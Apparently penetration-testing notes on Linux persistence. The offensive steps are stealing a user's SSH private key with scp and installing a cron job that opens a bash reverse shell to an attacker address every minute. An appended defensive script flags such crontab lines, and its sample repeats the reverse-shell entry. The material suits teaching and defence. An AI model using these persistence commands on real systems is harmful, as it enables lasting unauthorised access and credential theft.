# Linux Persistence

## Persistence Via SSH Keys

* Linux is typically deployed as a server operating system, so Linux servers are usually accessed remotely over services/protocols such as SSH.
* If SSH is enabled and running on a Linux system you have compromised, you can take advantage of the SSH configuration to establish persistent access on the target system.
* In most cases, Linux servers have key-based authentication enabled for the SSH service, allowing users to access the system remotely without a password.
* After gaining access to a Linux system, we can transfer the SSH private key of a specific user account to our system and use that SSH private key for all future authentication and access.

### Copying the id\_rsa (Private SSH Key) from Target System to Local System

To retrieve the `id_rsa` (private SSH key) from the target system to your local system, use the following `scp` command:

```sh
scp <user>@<ip>:<path_to_id_rsa> <path_to_put>
```

This command copies the private key from the target system to your local system. Make sure to set the correct paths.

#### Setting Permissions for id\_rsa

To set the appropriate permissions for `id_rsa`, use the following command:

```sh
chmod 400 id_rsa
```

This command restricts the file permissions on `id_rsa` to ensure it is only readable by the owner.

#### Logging into the Target System using the Private Key

To log in to the target system using the private key, use the following command:

```sh
ssh -i id_rsa <user>@<ip>
```

This command establishes an SSH connection to the target system, authenticating using the provided private key. Ensure you replace `<user>` and `<ip>` with the correct values.

## Persistence Via Cron Jobs

* Linux implements task scheduling through a utility called Cron. Cron is a time-based service that runs applications, scripts and other commands repeatedly on a specified schedule.
* An application or script that has been configured to run repeatedly with Cron is known as a cron job.
* We can use cron jobs to execute a command or script at a fixed interval to ensure we have persistent access to the target system.

*Figure: Anatomy Of A Cron Job*

### Setting Up a Cron Job for Maintaining Access

To create a cron job on the target Linux system that establishes a connection to your local system every minute, follow these steps:

1. Create a file named "cron" with the desired cron job configuration:

   ```sh
   echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'" > cron
   ```
2. Install the cron job by updating the crontab:

   ```sh
   crontab cron
   ```

#### Important Note

After setting up the cron job, ensure you have a listener set up on your local system. This way, every minute, the target system will attempt to connect to your local system, allowing you to maintain access.
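From the defender's side, the job above leaves a recognizable line in the user's crontab. The following added example (not part of the original notes) classifies crontab entries and flags the `/dev/tcp` redirect and interactive-shell markers; the function names, verdict labels and sample crontab are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original notes. Function names and verdict
# labels are assumptions; the sample crontab is constructed.

# classify_cron_line LINE -> prints "skip", "ok", or "<VERDICT> <reasons>"
classify_cron_line() {
    line=$1
    line=${line#"${line%%[![:space:]]*}"}      # strip leading whitespace
    case $line in ''|'#'*) echo "skip"; return 0 ;; esac
    reasons=""
    # /dev/tcp and /dev/udp are bash pseudo-paths that open network sockets
    case $line in */dev/tcp/*|*/dev/udp/*) reasons="$reasons,net-redirect" ;; esac
    # Interactive shell inside a non-interactive scheduler ("ssh -i" is not matched)
    case $line in *'bash -i'*|*'/sh -i'*|*' sh -i'*) reasons="$reasons,interactive-shell" ;; esac
    # Split into fields with globbing off so each '*' stays literal
    set -f; set -- $line; set +f
    if [ "$1 $2 $3 $4 $5" = '* * * * *' ]; then
        reasons="$reasons,every-minute"
    fi
    # Every-minute alone is common for legitimate jobs, so it never alerts by itself
    case $reasons in
        *net-redirect*)      echo "ALERT ${reasons#,}" ;;
        *interactive-shell*) echo "REVIEW ${reasons#,}" ;;
        *)                   echo "ok" ;;
    esac
}

# audit_crontab: read crontab text on stdin, print one line per flagged entry
audit_crontab() {
    n=0
    while IFS= read -r entry || [ -n "$entry" ]; do
        n=$((n + 1))
        verdict=$(classify_cron_line "$entry")
        case $verdict in
            ALERT*|REVIEW*) printf 'line %d: %s: %s\n' "$n" "$verdict" "$entry" ;;
        esac
    done
}

# Constructed sample; 192.0.2.10 is a documentation address, 4444 an arbitrary port
sample_crontab() {
    cat <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * /usr/bin/flock -n /tmp/q.lock /opt/app/worker
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/4444 0>&1'
EOF
}

sample_crontab | audit_crontab
```

On a live host, feed it each account's table, for example `crontab -l | audit_crontab`.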
